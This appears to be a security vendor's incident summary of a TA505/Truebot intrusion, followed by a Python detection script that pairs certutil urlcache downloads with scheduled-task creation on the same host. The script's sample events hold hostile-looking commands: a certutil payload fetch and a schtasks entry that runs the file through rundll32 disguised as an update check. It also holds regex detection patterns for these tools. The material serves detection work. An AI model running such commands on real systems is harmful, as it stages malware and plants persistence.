Summary

On 02 February 2023, an alert triggered in a Huntress-protected environment. At first glance, the alert itself was fairly generic - a combination of certutil using the urlcache flag to retrieve a remote resource and follow-on scheduled task creation - but further analysis revealed a more interesting set of circumstances. By investigating the event in question and pursuing root cause analysis (RCA), Huntress was able to link this intrusion to a recently announced vulnerability as well as to a long-running post-exploitation framework linked to prominent ransomware groups.
ADVERSARY: TA505
MALWARE FAMILY: Truebot
ATT&CK IDS: T1190 - Exploit Public-Facing Application, T1203 - Exploitation for Client Execution, T1053.005 - Scheduled Task, T1036.004 - Masquerade Task or Service, T1553.002 - Code Signing, T1078.003 - Local Accounts, T1140 - Deobfuscate/Decode Files or Information, T1218.011 - Rundll32, T1071.001 - Web Protocols, T1105 - Ingress Tool Transfer, T1571 - Non-Standard Port, T1132.001 - Standard Encoding
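As an added detection example (not code from the Huntress write-up), the following Python correlates the two behaviours the alert combined: a certutil urlcache download followed, on the same host and within a short window, by a schtasks /create. The process-creation records, host names, paths and URLs are constructed for illustration and are not indicators from the investigation.

```python
import re
from datetime import datetime, timedelta

# Constructed sample process-creation events (hypothetical Sysmon-style records).
# Fields: timestamp, host, parent image, command line.
SAMPLE_EVENTS = [
    ("2023-02-02T10:00:01", "WS01", "cmd.exe",
     "certutil.exe -urlcache -split -f http://203.0.113.10:8080/update.dat C:\\ProgramData\\update.dat"),
    ("2023-02-02T10:00:05", "WS01", "cmd.exe",
     'schtasks.exe /create /tn "WindowsUpdateCheck" /tr "rundll32.exe C:\\ProgramData\\update.dat,Start" /sc minute /mo 5'),
    # Benign-looking activity on another host: a certificate fetch and, hours later, an admin task.
    ("2023-02-02T11:30:00", "WS02", "explorer.exe",
     "certutil.exe -urlcache -split -f https://intranet.example.com/cert.cer C:\\Temp\\cert.cer"),
    ("2023-02-02T14:00:00", "WS02", "mmc.exe",
     'schtasks.exe /create /tn "Backup" /tr "C:\\Tools\\backup.exe" /sc daily'),
]

# certutil and schtasks accept both "-" and "/" switch prefixes, so match either.
CERTUTIL_URLCACHE = re.compile(r"certutil(\.exe)?\s.*[-/]urlcache", re.IGNORECASE)
SCHTASKS_CREATE = re.compile(r"schtasks(\.exe)?\s.*[-/]create", re.IGNORECASE)


def correlate(events, window=timedelta(minutes=30)):
    """Return (host, certutil_cmdline, schtasks_cmdline) triples where a
    schtasks /create followed a certutil urlcache download on the same host
    within `window`. Events are processed in timestamp order."""
    hits = []
    pending = {}  # host -> list of (timestamp, certutil command line) awaiting a follow-on task
    for ts_str, host, _parent, cmdline in sorted(events):
        ts = datetime.fromisoformat(ts_str)
        if CERTUTIL_URLCACHE.search(cmdline):
            pending.setdefault(host, []).append((ts, cmdline))
        elif SCHTASKS_CREATE.search(cmdline):
            for dl_ts, dl_cmd in pending.get(host, []):
                if timedelta(0) <= ts - dl_ts <= window:
                    hits.append((host, dl_cmd, cmdline))
    return hits


if __name__ == "__main__":
    for host, download, task in correlate(SAMPLE_EVENTS):
        print(f"[{host}] download: {download}\n        task:     {task}")
```

Widening the window (for example to several hours) also flags the WS02 pair, which is the usual tuning trade-off between catching slower operators and raising noise from legitimate certificate fetches.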